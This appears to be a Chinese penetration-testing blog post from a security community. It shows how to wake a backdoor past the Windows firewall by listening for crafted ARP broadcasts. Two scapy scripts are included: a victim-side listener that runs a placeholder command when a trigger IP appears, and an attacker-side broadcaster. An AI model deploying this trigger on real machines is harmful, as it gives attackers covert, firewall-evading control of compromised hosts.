背景
在渗透测试过程中,我们常常会遇到这种情况,目标上的木马被杀了,留了正向后门,却因为windows防火墙的原因,无法唤醒。所以我们就需要一种方法,来bypass防火墙唤醒我们的后门或者作为后门。
技术细节
选择协议
首先我们要远程唤醒,必然是要选择一种网络协议的。为了满足我们的需求,传输层及以传输层以上的协议是必然不能选择的。物理层和数据链路层是我们无法控制的。所以我们只能选择网络层的协议。网络层的协议(IP/ICMP/ARP/RARP/BGP)有以上协议供我们选择。
ARP协议(局域网中的工作情况)
ARP协议是设计用来通过网络地址(ip)定位MAC地址。在以太网协议中规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须要知道目标主机的MAC地址。而在TCP/IP协议中,网络层和传输层只关心目标主机的IP地址。这就导致在以太网中使用IP协议时,数据链路层的以太网协议接到上层IP协议提供的数据中,只包含目的主机的IP地址。于是需要一种方法,根据目的主机的IP地址,获得其MAC地址。这就是ARP协议要做的事情。所谓地址解析(address resolution)就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。在windows操作系统上使用arp -a即可看到自己的arp缓存表。
ARP报文结构
如果目的端主机的硬件地址是FF:FF:FF:FF:FF:FF,那么这是一个以太网广播地址。电缆上的每个以太网接口都要接收这个数据帧并对它进行处理。
后门设计
ARP默认防火墙是放行的,我们在受害者机器上监听ARP广播,如果有我们的特征码传过来,则唤醒后门进行下一步操作。在此我们使用scapy进行模拟。
listener.py from __future__ import print_function from scapy.all import * import sys def arp_display(pkt): if pkt[ARP].op == 1: # who-has (request) if pkt[ARP].pdst == 'xxxxxxx': os.system('xxxxx') return 'Request: {} is asking about {}'.format(pkt[ARP].psrc, pkt[ARP].pdst) if pkt[ARP].op == 2: # is-at (response) return '*Response: {} has address {}'.format(pkt[ARP].hwsrc, pkt[ARP].psrc) sniff(prn=arp_display, filter='arp', store=0, count=100) hacker.py from scapy.all import * def ip1(ip): pkt = send(ARP(op=ARP.who_has, psrc="hacker", pdst=ip),loop=1) x = sniff(filter="arp", count=10) print (x.summary()) print ("done") ip1("xxxx")
在受害者上运行listener.py,监听arp广播,攻击者运行hacker.py,广播寻找一个ip地址,受害者监听到这个广播地址,则会唤醒后门。
总结
在渗透测试的过程中,只要有信息交换的地方,都有可能被设计为C&C或者用来唤醒后门或者用来偷数据,比如360研究的ghost tunnel,比如arp。 本周六快手联合火线 举办线下「观火」白帽沙龙活动 ↓扫描二维码火速了解
【火线Zone】
火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~
我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!
欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!